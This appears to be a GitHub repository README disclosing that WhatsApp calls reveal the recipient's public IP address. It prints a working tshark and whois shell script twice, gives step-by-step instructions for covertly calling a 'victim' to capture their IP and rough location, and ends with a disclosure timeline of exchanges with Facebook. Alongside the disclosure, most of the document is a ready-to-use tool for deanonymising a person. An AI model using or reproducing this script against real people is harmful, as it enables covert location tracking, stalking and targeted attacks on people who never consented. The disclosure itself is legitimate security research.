├── LICENSE
└── README.md


/LICENSE:
--------------------------------------------------------------------------------
1 | Source code in this repository is covered by the Server Side Public License, v 1.
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ## Leak the IP address and Geolocation of target whatsapp user 
  2 | 
  3 | ### Disclaimer
  4 | 
  5 | This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using this program you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not bhdresh's responsibility.
  6 | 
  7 | Finally, this is a personal development, please respect its philosophy and don't use it for bad things!
  8 | 
  9 | ### Description/Impact
 10 | 
 11 | #### PoC Video:
 12 | 
 13 | https://vimeo.com/577355374
 14 | 
 15 | #### Complete Details
 16 | 
 17 | Latest version of whatsapp application on all platforms is vulnerable to remote whatsapp user public IP disclosure.
 18 | 
 19 | It is observed that during a whatsapp (voice / video) call, application on caller side tries to establish a direct connection with the public IP address of recipient device. By filtering the Facebook and WhatsApp server IP addresses from the destination hosts, it is possible to reveal the correct public IP address of the target whatsapp user without his knowledge.
 20 | 
 21 | Following is a quick script to exploit this vulnerability,
 22 | 
 23 | --------------------------
 24 | 
 25 | #!/bin/sh
 26 | 
 27 | filter=`tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"`
 28 | 
 29 | echo "Press Enter and call your target."
 30 | 
 31 | read line
 32 | 
 33 | tshark -i eth0 -l -T fields -f "udp" -e ip.dst -Y "$filter" -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" | while read line
 34 | do
 35 | whois $line > /tmp/b
 36 | 
 37 | filter=`cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l`
 38 | 
 39 | if [ "$filter" -gt 0 ] ; then
 40 | targetinfo=`cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"`
 41 | echo $line --- $targetinfo
 42 | fi
 43 | done
 44 | 
 45 | 
 46 | --------------------------
 47 | 
 48 | #### Impact
 49 | 
 50 | 
 51 | Possibility to map whatsapp users with their public IP will not just reveal whatsapp users' location information but can also be misused to track their physical movement by maintaining location history. Such direct mapping between user to IP information can also be misused to track users' surfing habits and to influence him.
 52 | 
 53 | Further, the public IP could be exploited to launch targeted attacks towards whatsapp user home or office.
 54 | 
 55 | ### Repro Steps
 56 | 
 57 | #### Setup
 58 | 
 59 | Users: UserA is has whatsapp detail of UserB
 60 | 
 61 | Environment: n/a
 62 | 
 63 | Browser: n/a
 64 | 
 65 | App version: <=latest version of whatsapp application on any platform
 66 | 
 67 | OS: All platforms except web
 68 | 
 69 | Description: UserA makes a whatsapp call to UserB and captures his public IP information without UserB's knowledge. Video PoC for better understanding of steps: https://vimeo.com/577355374
 70 | 
 71 | 
 72 | 
 73 | #### Steps
 74 | 
 75 | Step 1: Start WiFi hotspot on attacker machine and connect attacker phone to attacker SSID
 76 | 
 77 | Step 2: Start the PoC script (below) on attacker machine which is now acting as a router for attacker phone
 78 | 
 79 | 
 80 | --------------------------
 81 | 
 82 | #!/bin/sh
 83 | 
 84 | filter=`tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"`
 85 | 
 86 | echo "Press Enter and call your target."
 87 | 
 88 | read line
 89 | 
 90 | tshark -i eth0 -l -T fields -f "udp" -e ip.dst -Y "$filter" -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" | while read line
 91 | do
 92 | whois $line > /tmp/b
 93 | 
 94 | filter=`cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l`
 95 | 
 96 | if [ "$filter" -gt 0 ] ; then
 97 | targetinfo=`cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"`
 98 | echo $line --- $targetinfo
 99 | fi
100 | done
101 | 
102 | 
103 | --------------------------
104 | 
105 | 
106 | Step 3: Call any whatsapp user randomly to capture the server IP addresses to filter
107 | 
108 | Step 4: Call victim on his whatsapp
109 | 
110 | Step 5: Disconnect the call once established
111 | 
112 | Step 6: Script will reveal the public IP address of the target
113 | 
114 | Step 7: Validate the public IP address on target phone
115 | 
116 | ### Disclosure timeline
117 | 
118 | 1) October 14, 2020 - Reported vulnerability to Facebook
119 | 2) October 14, 2020 - Response from Facebook (Thank you for your report. In this case, the issue you've described is actually just intended functionality and therefore doesn't qualify for a bounty.)
120 | 3) October 14, 2020 - Reply to Facebook (could you please let me know how WhatsApp users could mitigate this accidental disclosure of his IP and potential private information about his location?)
121 | 4) October 16, 2020 - Follow up email
122 | 5) October 20, 2020 - Response from Facebook (Due to the nature of the peer to peer protocol, the best methods for users who may be concerned about accidental disclosure is to take a proactive approach. This can include limiting calls to trusted users or using a VPN.)
123 | 6) January 18, 2021 - Requesting permission for public disclosure (In such a case, is it fine if I publish this finding with public disclosure?)
124 | 7) January 18, 2021 - Response from Facebook (The decision to publish is entirely yours. There are no penalties for doing so.)
125 | 8) March 20, 2021 - Further communication with Facebook (During my research have noticed that Signal has introduced a feature to relay calls through the signal server to void revealing IP addresses....Could you please recheck the approach to limit calls to trusted users or using a VPN? I believe using VPN all the time is not a feasible solution to protect the location privacy.)
126 | 9) March 23, 2021 - Response from Facebook (At this time we are content with our current implementation of WhatsApp calling.)
127 | 10) July 03, 2021 - Public disclosure
128 | 


--------------------------------------------------------------------------------